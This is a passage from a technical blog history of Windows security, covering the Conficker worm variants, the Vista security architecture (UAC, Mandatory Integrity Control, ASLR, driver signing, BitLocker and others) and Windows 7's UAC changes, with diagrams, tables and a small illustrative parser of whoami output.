&lt;p&gt;The audit-mandated date correction: Conficker.A first detected in late November 2008, with November 20, 2008 as the canonical SRI anchor [@s-sri-conficker-c-addendum]. The October-2008 in-the-wild MS08-067 exploitation reported in NVD is Gimmiv.A, not Conficker [@s-nvd-cve-2008-4250].&lt;/p&gt;
&lt;h3&gt;5.9 December 2008 through April 2009: Conficker.B, C, E&lt;/h3&gt;
&lt;p&gt;The variant taxonomy matters because it is the evidence base for how quickly the worm&apos;s authors learned, and how the Conficker Working Group&apos;s coordinated defense responded. Conficker.B in late December 2008 added removable-drive autorun spreading, a dictionary attack against weak shares, and a fallback exploit path against the older MS06-040 vulnerability for the small fraction of targets that were still unpatched against it.&lt;/p&gt;
&lt;p&gt;Conficker.A already had a 250-domain-per-day Domain Generation Algorithm; what Conficker.C added on March 4, 2009 at 6 p.m. PST (March 5 UTC) was a 50,000-domain-per-day rendezvous-pool expansion across 110 top-level domains &lt;em&gt;and&lt;/em&gt; a peer-to-peer coordination channel that no longer required successful DNS rendezvous -- two functional additions of the same variant, not two sequential revisions. The SRI &quot;An Analysis of Conficker C&quot; addendum is explicit on this: variant C &quot;incorporates a major restructuring of B&apos;s previous thread architecture and program logic, including major functional additions such as a new peer-to-peer (P2P) coordination channel, and a revision of the domain generation algorithm (DGA)&quot; [@s-sri-conficker-c-addendum]. Conficker.E, in April 2009, added payload-delivery for scareware and the Waledac spam botnet; the in-era variant chain runs A to B to C to E, matching both the SRI primary and the CWG taxonomy.&lt;/p&gt;
&lt;p&gt;Conficker.B&apos;s MS06-040 fallback exploit path was scoped to Windows 2000 targets only -- the older bulletin&apos;s RCE vector did not reach the post-2003 SMB stack the same way. The Conficker Working Group taxonomy is sometimes summarised in ways that imply the MS06-040 fallback was a broader secondary attack vector; it was not.&lt;/p&gt;
&lt;h3&gt;5.10 February 12, 2009: Conficker Working Group and the $250,000 bounty&lt;/h3&gt;
&lt;p&gt;On February 12, 2009 Microsoft posted a US$250,000 bounty for information leading to the arrest and conviction of Conficker&apos;s authors, and the Conficker Working Group formally constituted itself as a coordinated industry response -- Microsoft, ICANN, F-Secure, Symantec, Verisign, Georgia Tech, and roughly 120 other participating organisations [@s-cwg-lessons-learned-2019].&lt;/p&gt;
&lt;p&gt;The CWG&apos;s &quot;Lessons Learned&quot; final report (June 17, 2010) is the canonical post-mortem primary that the rest of this article relies on for variant taxonomy, infection-count framing, and the deployment-velocity-ceiling argument [@s-cwg-lessons-learned-2019]. The 9-to-15-million infected machines figure is the report&apos;s own range; counts varied with measurement methodology and with which Conficker variants the counter included.SRI International&apos;s per-country infection table from the same period shows the geographic distribution: China (about 2.65M observed bots), Brazil (about 1.02M), Russia (about 836K), India (about 607K), Argentina (about 569K) topping the list [@s-sri-conficker-resources]. The distribution tracked installed-base size of unpatched XP and Server 2003 closely.&lt;/p&gt;
&lt;p&gt;Vista shipped on November 8, 2006 and the world made up its mind about the reception by mid-2007. To understand why the architecture survived the reception, we have to look at what the architecture actually was -- feature by feature -- and what each feature defended against.&lt;/p&gt;
&lt;h2&gt;6. The Vista Security Catalogue&lt;/h2&gt;
&lt;p&gt;Open &lt;em&gt;Windows Internals&lt;/em&gt;, 5th edition (Russinovich, Solomon, and Ionescu, Microsoft Press, 2009) [@s-windows-internals-5e] to the security chapter and the table of contents reads like a list of features Microsoft did not have eighteen months earlier. Eight features in particular form the Vista security architecture, not because they were the only changes, but because every other Vista security improvement either depends on one of these or polishes one of these.&lt;/p&gt;
&lt;h3&gt;6.1 The integrity-level stack: UAC, MIC, and UIPI&lt;/h3&gt;
&lt;p&gt;User Account Control is the consumer-visible part. Underneath sit two architectural primitives that do almost all the work: Mandatory Integrity Control and User Interface Privilege Isolation.&lt;/p&gt;
&lt;p&gt;UAC&apos;s split-token model works like this. When an interactive user logs on whose group membership includes Administrators, the Local Security Authority issues two access tokens, not one. The filtered token has Administrators removed (more precisely, marked deny-only) and the high-privilege list stripped down to the standard-user set; the full token retains everything.&lt;/p&gt;
&lt;p&gt;The user session starts running under the filtered token by default. When a program tries to perform an operation that requires the full token -- writing under &lt;code&gt;%ProgramFiles%&lt;/code&gt;, modifying &lt;code&gt;HKLM&lt;/code&gt;, loading a driver -- the Application Information service displays a Secure Desktop consent prompt. On consent, the full token is released for that process only; the rest of the session continues on the filtered token.&lt;/p&gt;

The Vista feature that runs interactive administrator accounts under a filtered standard-user token by default and prompts for explicit consent before releasing the full administrator token to a specific process. The Secure Desktop switch isolates the consent prompt from window-message injection by lower-integrity processes. Russinovich is explicit in the load-bearing primary: elevations were introduced as a convenience, and their existence &quot;prevents OTS elevations from being a security boundary&quot; [@s-russinovich-uac-technet]. The boundary classification arrives much later with Administrator Protection in the 2024 to 2026 Windows 11 era.
&lt;p&gt;Mandatory Integrity Control adds the second axis the discretionary-access-control model never had. Every process token carries an integrity-level SID drawn from a small set -- Untrusted &lt;code&gt;S-1-16-0&lt;/code&gt;, Low &lt;code&gt;S-1-16-4096&lt;/code&gt;, Medium &lt;code&gt;S-1-16-8192&lt;/code&gt;, High &lt;code&gt;S-1-16-12288&lt;/code&gt;, System &lt;code&gt;S-1-16-16384&lt;/code&gt; -- and every securable object carries an integrity-level access control entry indicating the minimum integrity required to write (and optionally read or execute). The kernel&apos;s access check evaluates integrity before the discretionary ACL [@s-msft-mic-win32]. A Low-integrity process holding a handle to a Medium-integrity registry key cannot write to it regardless of what the DACL says.&lt;/p&gt;

Vista&apos;s mandatory-access-control primitive added to the Windows access-check pipeline. MIC attaches an integrity-level SID to every process token and an integrity-level ACE to every securable object, then evaluates the integrity comparison before the discretionary access control list. MIC is the architectural substrate every later Windows containment story (AppContainer, Modern Apps, browser sandbox, Office Protected View, WDAG, VBS) inherits [@s-msft-mic-win32].
&lt;p&gt;User Interface Privilege Isolation closes the third class of cross-integrity attack: window-message injection. Before UIPI, any process in the same desktop could send window messages (SendMessage, PostMessage, WM_TIMER, SetWindowsHookEx) to any other process&apos;s windows, including elevated ones. Chris Paget&apos;s 2002 &quot;shatter attack&quot; paper had walked through the attack surface methodically. UIPI prevents a lower-integrity process from sending most messages to higher-integrity windows; the Secure Desktop completes the closure for the consent UI itself by drawing it on a separate desktop the user-session processes cannot reach.&lt;/p&gt;

Vista&apos;s mechanism preventing lower-integrity processes from sending window messages (SendMessage, PostMessage, SetWindowsHookEx, WM_TIMER, etc.) to higher-integrity windows on the same desktop. Closes the shatter-attack class documented by Chris Paget in 2002. Together with the Secure Desktop, UIPI is the closure that makes the UAC consent prompt actually resistant to programmatic dismissal from a malware process running in the same user session.

flowchart TD
    A[Interactive logon as Administrator] --&amp;gt; B[LSA splits token]
    B --&amp;gt; C[Filtered standard-user token]
    B --&amp;gt; D[Full administrator token held aside]
    C --&amp;gt; E[User session starts under filtered token]
    E --&amp;gt; F[Program requests admin operation]
    F --&amp;gt; G[Application Information service intercepts]
    G --&amp;gt; H[Secure Desktop switch]
    H --&amp;gt; I[UAC consent prompt]
    I --&amp;gt; J{&quot;Consent?&quot;}
    J -- Yes --&amp;gt; K[Full token released to this process only]
    J -- No --&amp;gt; L[Operation denied]
    K --&amp;gt; M[Process runs at High integrity]
    L --&amp;gt; E
&lt;p&gt;Russinovich&apos;s &quot;Inside Windows Vista User Account Control&quot; in &lt;em&gt;TechNet Magazine&lt;/em&gt; June 2007 is the canonical primary on design intent [@s-russinovich-uac-technet]; a separate Mark&apos;s-Blog post dated February 12, 2007 anchored the multi-part TechNet &lt;em&gt;blog&lt;/em&gt; series on PsExec and the restricted-token discussion [@s-russinovich-psexec-blog]. The two are distinct primaries and the article does not conflate them.&lt;/p&gt;
&lt;p&gt;The TechNet Magazine UAC article is a single standalone piece at asset id &lt;code&gt;cc138019&lt;/code&gt; [@s-russinovich-uac-technet]. There is a separately numbered Magazine asset at &lt;code&gt;cc162493&lt;/code&gt; that is sometimes mis-cited as &quot;Part 2&quot; of the UAC series; live fetches of that URL return an unrelated Raymond Chen column. The article cites &lt;code&gt;cc138019&lt;/code&gt; only and treats the February 12, 2007 blog post as the start of the distinct multi-part blog series.&lt;/p&gt;
&lt;h3&gt;6.2 Anti-exploit mitigations: ASLR and Vista-era DEP refinements&lt;/h3&gt;
&lt;p&gt;Vista is the first Windows release to ship Address Space Layout Randomization. Vista&apos;s ASLR randomizes the load address of system DLLs and of executables linked with &lt;code&gt;/DYNAMICBASE&lt;/code&gt;; it is opt-in for user code. Mandatory ASLR for all images is a later-Windows feature, with Force ASLR appearing in EMET and in Windows 8, and full enforcement landing in Windows 10. The randomization is per-boot for system images and per-process-load for user images. Entropy on x86 is roughly 8 bits (256 possible base addresses), and considerably more on x64.&lt;/p&gt;

A defense that randomizes the base addresses of executable images, libraries, the stack, and the heap so attackers cannot predict the location of useful code or data. Vista (January 2007) was the first Windows release to ship ASLR; Vista&apos;s implementation randomized system DLLs and `/DYNAMICBASE`-linked user images, with per-boot randomization for system images and per-process-load randomization for user images. The Linux-side prior art is PaX [@s-pax-aslr-live, @s-pax-docs-index], and OpenBSD 3.4 (November 1, 2003) was the first general-purpose OS to ship integrated W^X plus library-load-order randomization default-on [@s-openbsd-3-4-wayback]. The brute-force entropy bound is the Shacham et al. CCS 2004 result [@s-shacham-asrandom-ccs2004].
&lt;p&gt;The Shacham et al. CCS 2004 paper showed that 8 bits of ASLR entropy yields an expected $2^{7} = 128$ attempts to brute-force the base on a target process that respawns after crash [@s-shacham-asrandom-ccs2004]. The result is why x64 ASLR (with substantially more bits of entropy) is qualitatively different and why Force ASLR in Windows 8 was a categorical improvement over Vista&apos;s opt-in model.&lt;/p&gt;
&lt;p&gt;The DEP refinements in Vista are mostly about loader cooperation. Vista&apos;s PE loader respects the &lt;code&gt;IMAGE_DLLCHARACTERISTICS_NX_COMPAT&lt;/code&gt; flag, so binaries that opt in to DEP get the policy applied without per-process configuration. SEHOP (Structured Exception Handler Overwrite Protection) precursor work also lands.&lt;/p&gt;
&lt;p&gt;Three years later, Hovav Shacham&apos;s CCS 2007 paper on Return-Oriented Programming will show that DEP alone is necessary but not sufficient: an attacker who cannot inject and execute new code can still chain together existing executable-code &quot;gadgets&quot; from already-loaded modules to construct functional payloads [@s-shacham-rop-geometry-ccs2007]. That insight is what drives the next generation of Windows mitigations -- &lt;a href=&quot;https://paragmali.com/blog/control-flow-integrity-on-windows-cfg-xfg-and-the-cet-shadow/&quot; rel=&quot;noopener&quot;&gt;CFG, CET&lt;/a&gt;, /GUARD:EH -- but those are out of era.&lt;/p&gt;
&lt;h3&gt;6.3 Kernel self-protection on x64: inherited PatchGuard, new mandatory KMCS&lt;/h3&gt;
&lt;p&gt;Vista did not introduce PatchGuard; it inherited the April 2005 x64 mechanism. What Vista x64 did introduce is &lt;em&gt;mandatory&lt;/em&gt; kernel-mode driver signing. Unsigned drivers do not load on Vista x64 under the Kernel-Mode Code Signing policy.&lt;/p&gt;
&lt;p&gt;The documented escape hatch for development is &lt;code&gt;bcdedit /set testsigning on&lt;/code&gt;, which causes the boot loader to honour test-signing-rooted certificates and which displays a permanent desktop watermark to make the state of the machine visible. Together with the inherited PatchGuard, the combination foreclosed the dominant 2003-era rootkit installation path: drop a &lt;code&gt;.sys&lt;/code&gt;, register it via SCM, kernel loads it with no signature check, kernel hooks become trivial [@s-msft-driver-signing].&lt;/p&gt;

The Vista x64 policy that refuses to load kernel-mode drivers unless they carry a digital signature rooted in a Microsoft-trusted certificate chain (Microsoft WHQL, a cross-certified third-party CA, or a Microsoft Hardware certificate). `bcdedit /set testsigning on` is the documented development-time escape hatch. Vista x86 never received mandatory KMCS, which is one of the structural reasons x64 became the dominant Windows architecture during the next decade [@s-msft-driver-signing].
&lt;p&gt;x86 Vista did not get mandatory KMCS, because the installed-base compatibility cost was deemed too high; the x86 / x64 asymmetry is one reason x64 became the dominant Windows architecture by 2010. The post-2010 afterlife is &quot;Bring Your Own Vulnerable Driver&quot; attacks: KMCS forecloses unsigned drivers but does not address the case of a legitimately signed driver containing a vulnerability the attacker exploits to gain kernel-mode code execution. BYOVD became the dominant rootkit-loading path from approximately 2010 onward, and the Microsoft Vulnerable Driver Block list (2020 onward) is the architectural response.&lt;/p&gt;

The post-KMCS attack pattern in which an attacker installs a legitimately signed kernel-mode driver that contains an exploitable vulnerability, then exploits the driver to gain ring-0 code execution. KMCS forecloses the unsigned-driver path but does not prevent loading of signed drivers, so attackers brought their own. Architectural closure waits for the Microsoft Vulnerable Driver Block list and Hypervisor-Protected Code Integrity, both of which post-date this article&apos;s era.
&lt;h3&gt;6.4 Service Hardening&lt;/h3&gt;
&lt;p&gt;Service Hardening is the Vista feature that most reduced the blast radius of a service-level exploit even when exploitation succeeded. Three changes did the work. Per-service SIDs of the form &lt;code&gt;NT SERVICE\&amp;lt;servicename&amp;gt;&lt;/code&gt; give every service a distinct security principal -- the previous model was that every service running as &lt;code&gt;LocalSystem&lt;/code&gt; shared the same identity.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;NT AUTHORITY\WRITE RESTRICTED&lt;/code&gt; tokens constrain a service to writing only to resources whose DACL explicitly grants its per-service SID, even when the service token nominally has higher privileges. Minimum-privilege configuration replaces the historical &lt;code&gt;LocalSystem&lt;/code&gt; superset; the SCM lets services declare exactly which privileges they require. And Windows Firewall rules can be authored per-service-SID, so a compromised service can be blocked from reaching the network even if the rest of the box can. The print primary is &lt;em&gt;Windows Internals&lt;/em&gt;, 5th edition (Russinovich, Solomon, Ionescu, Microsoft Press, 2009) [@s-windows-internals-5e].&lt;/p&gt;

A security identifier of the form `NT SERVICE\` distinct to each Windows service, automatically derived from the service short name. Per-service SIDs are the primitive that lets a host firewall rule, a `WRITE RESTRICTED` token policy, or a registry-key DACL constrain a single service without affecting any other service in the same `svchost.exe` process or any other principal sharing the same logon SID.
&lt;h3&gt;6.5 Windows Resource Protection&lt;/h3&gt;
&lt;p&gt;Windows Resource Protection replaces Windows File Protection (the Windows 2000-era SFC mechanism), whose model was &quot;the OS keeps a hidden catalog of canonical copies and silently replaces tampered system files.&quot; WRP is ACL-based instead. Protected files and registry keys are owned by the &lt;code&gt;TrustedInstaller&lt;/code&gt; SID; the DACL grants modify rights only to &lt;code&gt;TrustedInstaller&lt;/code&gt;. Administrators retain read access and can take ownership, but they cannot modify protected resources directly without that ownership transfer. The protection extends to registry keys, which WFP/SFC did not cover [@s-windows-internals-5e].&lt;/p&gt;

Vista&apos;s replacement for the Windows 2000 to XP-era Windows File Protection / SFC catalog-and-replace mechanism. WRP is ACL-based: protected files and registry keys are owned by `TrustedInstaller` and the DACL restricts modify access to `TrustedInstaller` itself; administrators can take ownership but cannot modify protected resources directly without that step. The protection also covers registry keys, which the older WFP did not. Note: the acronym &quot;WFP&quot; in this paragraph (Windows File Protection) is unrelated to the &quot;WFP&quot; (Windows Filtering Platform) in section 6.6.
&lt;h3&gt;6.6 Windows Filtering Platform&lt;/h3&gt;
&lt;p&gt;Vista and Server 2008 replace the prior NDIS-IM, TDI, and firewall-hook stack-extension architecture with the &lt;a href=&quot;https://paragmali.com/blog/windows-filtering-platform-the-kernel-mode-firewall-you-dont/&quot; rel=&quot;noopener&quot;&gt;Windows Filtering Platform&lt;/a&gt;: a kernel-mode framework of filtering layers (transport, network, application-layer enforcement), shims, and callout drivers giving third-party firewalls, IDS/IPS, and content filters a supported extension surface. The Base Filtering Engine in user mode centralises policy. Windows Firewall in Vista and every release thereafter sits on top of WFP.&lt;/p&gt;
&lt;p&gt;Forshaw&apos;s Project Zero post documents the three-tier architecture directly: &quot;MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel which is where the firewall processing is handled&quot; [@s-forshaw-projectzero-wfp].&lt;/p&gt;

Vista&apos;s kernel-mode replacement for the NDIS-IM, TDI, and firewall-hook stack-extension architecture that prior third-party firewalls had hooked into. WFP exposes filtering layers (transport, network, application-layer enforcement) plus a callout-driver API, with the user-mode Base Filtering Engine centralising policy and the Microsoft Protection Service service translating Windows Firewall rules into WFP filters. Note: the acronym &quot;WFP&quot; in this paragraph (Windows Filtering Platform) is unrelated to the &quot;WFP&quot; (Windows File Protection) in section 6.5; they are two unrelated three-letter abbreviations that happen to share initials [@s-forshaw-projectzero-wfp].

flowchart LR
    A[Windows Firewall policy] --&amp;gt; B[MPSSVC user-mode service]
    B --&amp;gt; C[Base Filtering Engine BFE user mode]
    C --&amp;gt; D[TCPIP.SYS kernel-mode filter]
    E[Third-party firewall or IDS] --&amp;gt; C
    F[Callout drivers] --&amp;gt; D
    D --&amp;gt; G[Network packets in or out]
&lt;h3&gt;6.7 BitLocker Drive Encryption&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; shipped in Windows Vista Enterprise and Ultimate editions on January 30, 2007, and in Windows Server 2008. Protector modes were TPM-only (seal-to-PCR), TPM+PIN, TPM+startup-key, and recovery-key. The cipher was AES-CBC with the Elephant Diffuser, an additional diffusion layer Niels Ferguson designed specifically for the disk-encryption setting and documented in his August 2006 Microsoft whitepaper &quot;AES-CBC + Elephant Diffuser: A Disk Encryption Algorithm for Windows Vista&quot; [@s-ferguson-bitlocker]. The SKU limitation materially constrained deployment reach -- most Vista consumers ran Home Basic or Home Premium, neither of which included BitLocker at all.&lt;/p&gt;

Microsoft&apos;s full-volume encryption feature, first shipped in Windows Vista Enterprise and Ultimate (January 30, 2007) and in Windows Server 2008. Original Vista cipher: AES in CBC mode with Niels Ferguson&apos;s Elephant Diffuser overlay [@s-ferguson-bitlocker]. Protector modes: TPM-only (seal-to-PCR), TPM+PIN, TPM+startup-key, and recovery-key. The Vista release was edition-gated, which limited deployment reach materially across the consumer Vista base.
&lt;p&gt;The era&apos;s load-bearing known weakness for TPM-only mode is the cold-boot attack documented in Halderman et al., &quot;Lest We Remember: Cold Boot Attacks on Encryption Keys,&quot; USENIX Security 2008 [@s-halderman-coldboot-jhalderm]. DRAM remanence after power-off plus low-temperature imaging let an attacker reconstruct AES keys from a system whose disk was seal-to-PCR-decrypted at boot. The architectural answer -- TPM+PIN as the configuration for any threat model that includes physical access -- is the same in 2026 as it was in 2008.&lt;/p&gt;
&lt;h3&gt;6.8 Auxiliary hardening that landed quietly&lt;/h3&gt;
&lt;p&gt;Several Vista security features did not make front-page reviews but matter for the modern stack. Session-0 isolation moved services out of the interactive user session, closing the cross-session shatter attack on services. Protected Processes for DRM media paths became the precursor of PPL (&lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light&lt;/a&gt;), which is the substrate for LSA Protection and Credential Guard.&lt;/p&gt;
&lt;p&gt;Windows Defender shipped as built-in antimalware (originally GIANT AntiSpyware, which Microsoft acquired in December 2004) [@s-msft-giant-press-2004]. Network Access Protection (NAP) provided the framework for posture-checking machines before allowing network access -- later superseded by conditional access and never broadly deployed. Cryptography Next Generation (CNG) replaced CryptoAPI and is the substrate every modern Windows crypto operation runs on top of. The Volume Shadow Copy refactor enabled Previous Versions in the file Properties dialog.&lt;/p&gt;
&lt;h3&gt;The Vista feature table&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vista feature&lt;/th&gt;
&lt;th&gt;Attack class defended&lt;/th&gt;
&lt;th&gt;Compatibility cost&lt;/th&gt;
&lt;th&gt;Status in 2026&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;UAC + MIC + UIPI&lt;/td&gt;
&lt;td&gt;Cross-integrity write, cross-integrity UI injection&lt;/td&gt;
&lt;td&gt;Prompt fatigue; admin scripts requiring elevation&lt;/td&gt;
&lt;td&gt;ACTIVE (MIC is the substrate of every modern Windows sandbox)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ASLR + DEP refinements&lt;/td&gt;
&lt;td&gt;Predictable-address shellcode, stack/heap execution&lt;/td&gt;
&lt;td&gt;JIT compilers; non-DYNAMICBASE third-party DLLs&lt;/td&gt;
&lt;td&gt;ACTIVE (Force ASLR mandatory in Windows 10)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Inherited PatchGuard + mandatory x64 KMCS&lt;/td&gt;
&lt;td&gt;Unsigned-driver rootkits, kernel inline patching&lt;/td&gt;
&lt;td&gt;x86/x64 split; test-signing escape hatch&lt;/td&gt;
&lt;td&gt;ACTIVE (BYOVD response is post-era; HVCI in Win 10 Anniversary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Service Hardening&lt;/td&gt;
&lt;td&gt;Service-exploit blast radius&lt;/td&gt;
&lt;td&gt;LocalSystem-assuming legacy services&lt;/td&gt;
&lt;td&gt;ACTIVE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Resource Protection&lt;/td&gt;
&lt;td&gt;Direct overwrite of OS files and registry&lt;/td&gt;
&lt;td&gt;Administrators cannot directly modify system files&lt;/td&gt;
&lt;td&gt;ACTIVE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Filtering Platform&lt;/td&gt;
&lt;td&gt;NDIS hooking, unsupported third-party network filters&lt;/td&gt;
&lt;td&gt;Third-party firewalls and AV had to port to WFP&lt;/td&gt;
&lt;td&gt;ACTIVE (every Windows network filter sits on WFP)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BitLocker Drive Encryption&lt;/td&gt;
&lt;td&gt;Data-at-rest exposure on lost / stolen devices&lt;/td&gt;
&lt;td&gt;SKU limited to Enterprise + Ultimate; TPM-only is cold-boot-vulnerable&lt;/td&gt;
&lt;td&gt;ACTIVE (cipher modernised to AES-XTS in Windows 10)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Session-0 isolation + Protected Processes + Defender + NAP + CNG&lt;/td&gt;
&lt;td&gt;Cross-session shatter on services, weak crypto primitives, etc.&lt;/td&gt;
&lt;td&gt;Service authors had to handle no-interactive-desktop case&lt;/td&gt;
&lt;td&gt;ACTIVE (CNG, Defender); NAP SUPERSEDED-BY conditional access&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Eight features. Three audit-mandated corrections. One architectural shift the consumer noticed -- a prompt. The next chapter argues that the prompt the consumer hated is not the breakthrough; the integrity-level stack underneath it is.&lt;/p&gt;
&lt;h2&gt;7. UAC Is the Surface; MIC Is the Substrate&lt;/h2&gt;
&lt;p&gt;Every Vista user remembers the prompt. Almost no Vista user can describe what the prompt was actually a prompt for. The prompt is the consumer-visible surface of the integrity-level stack. The integrity-level stack is the architectural achievement -- the first OS-level Windows mechanism to recognise that the discretionary-access-control model of Cutler-era NT could not express the policy that mattered.&lt;/p&gt;
&lt;p&gt;Recall the integrity-level SIDs from section 6.1, organised as a small table:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Integrity level&lt;/th&gt;
&lt;th&gt;SID&lt;/th&gt;
&lt;th&gt;Operational use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Untrusted&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-0&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Anonymous, deeply isolated processes (rare in default Windows)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-4096&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Sandboxed processes (IE Protected Mode tab, AppContainer in Windows 8+)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-8192&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Default for normal user processes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-12288&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Elevated processes after UAC consent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-16384&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Kernel-mode and the most privileged service hosts&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The argument is this. Discretionary access control could not distinguish &quot;Administrator the user&quot; from &quot;Administrator&apos;s freshly downloaded script&quot; because both ran with the same access token, and a DACL only encodes which principals can perform which operations. MIC can distinguish them.&lt;/p&gt;
&lt;p&gt;The downloaded script runs at Low integrity (web-zone provenance, set by AES and inherited by the spawned process). The user shell runs at Medium or High. The integrity-level check evaluates &lt;em&gt;before&lt;/em&gt; the DAC and blocks the cross-integrity write regardless of what the DAC would have permitted. UIPI then closes the second class of cross-integrity attack -- window-message injection -- so the same Low-integrity process cannot use SendMessage to puppet a Medium-integrity window into doing what its DAC would not allow it to do directly.&lt;/p&gt;
&lt;p&gt;{`
// Illustrative parser. The real PowerShell command is:
//   whoami /groups /priv
// which dumps the SIDs and privileges in the current token. The
// &quot;Mandatory Label\\Medium Mandatory Level&quot; line carries the integrity SID.&lt;/p&gt;
&lt;p&gt;const sampleWhoamiOutput = `
Mandatory Label\\High Mandatory Level     Label            S-1-16-12288
BUILTIN\\Administrators                   Alias            S-1-5-32-544
SeLoadDriverPrivilege                  Load and unload device drivers       Enabled
SeShutdownPrivilege                    Shut down the system                 Enabled
`;
const intLineRe = /Mandatory Label\\\\(Low|Medium|High|System) Mandatory Level\\s+\\S+\\s+(S-1-16-\\d+)/;
const m = sampleWhoamiOutput.match(intLineRe);
const elevatedPrivs = [&quot;SeLoadDriverPrivilege&quot;,&quot;SeTcbPrivilege&quot;,&quot;SeBackupPrivilege&quot;];
const has = p =&amp;gt; sampleWhoamiOutput.includes(p + &quot; &quot;) &amp;amp;&amp;amp; sampleWhoamiOutput.includes(&quot;Enabled&quot;);
if (m) console.log(`Integrity level: ${m[1]} (${m[2]})`);
console.log(&quot;Likely elevated:&quot;, elevatedPrivs.some(has) ? &quot;yes&quot; : &quot;no&quot;);
`}&lt;/p&gt;
&lt;p&gt;Here is what the Aha lands on. Without MIC, every later Windows containment story -- &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt; (Windows 8 Modern Apps), the Chromium and Edge browser sandboxes, IE Protected Mode, Office Protected View, Adobe Reader&apos;s sandbox, Windows Defender Application Guard, Virtualization-Based Security and Credential Guard -- would have had to invent the per-process trust-level primitive from scratch. Every one of them inherits MIC. The prompt is throwaway; the substrate is permanent. The full integrity-level-stack history through Administrator Protection is traced in the &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless&lt;/a&gt; companion post.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; UAC is the prompt the user saw. MIC is the substrate every later Windows containment story inherits. The Vista security story is not the UI consent flow most reviewers focused on -- it is the integrity-level SID on every process token and the integrity-level ACE on every securable object, evaluated before the DAC, in the access-check pipeline of every Windows release since.&lt;/p&gt;
&lt;/blockquote&gt;

The prompt the consumer hated is not the breakthrough; the integrity-level stack underneath it is.
&lt;p&gt;If Vista&apos;s architecture was right, why was Vista&apos;s reception wrong? The answer is not the prompt. The answer is what the prompt interrupted -- the everyday workflow that, on XP, had been a long-uninterrupted sequence of operations the user did not realise required administrative authority. The next chapter is the polish.&lt;/p&gt;
&lt;h2&gt;8. Windows 7 as the Vista Polish&lt;/h2&gt;
&lt;p&gt;Windows 7 reached general availability on October 22, 2009. Reviews were positive in a way Vista&apos;s never were. The security architecture underneath had barely changed.&lt;/p&gt;
&lt;p&gt;The Vista security architecture is preserved almost entirely in Windows 7. UAC, MIC, and UIPI carry forward. BitLocker carries forward, gaining BitLocker To Go for removable drives. Both WFPs (the Filtering Platform and Resource Protection) carry forward. ASLR and DEP carry forward. Service Hardening carries forward, with additional per-service-SID coverage for previously-overlooked service hosts. Mandatory x64 KMCS carries forward. The Security Center is reborn as Action Center with an aggregated maintenance surface alongside the security surface.&lt;/p&gt;
&lt;p&gt;Windows 7 did change the integration. UAC gained a four-level slider in Control Panel -- Always Notify, Notify when programs try to make changes (the default), Notify but don&apos;t dim the desktop, and Never Notify -- and an &quot;auto-elevate&quot; whitelist for signed Microsoft binaries that the system trusted to elevate themselves without a consent prompt. The slider made the prompt fatigue UI-tunable for the first time. The auto-elevate whitelist, however, is the load-bearing UAC-bypass surface for the next decade.&lt;/p&gt;
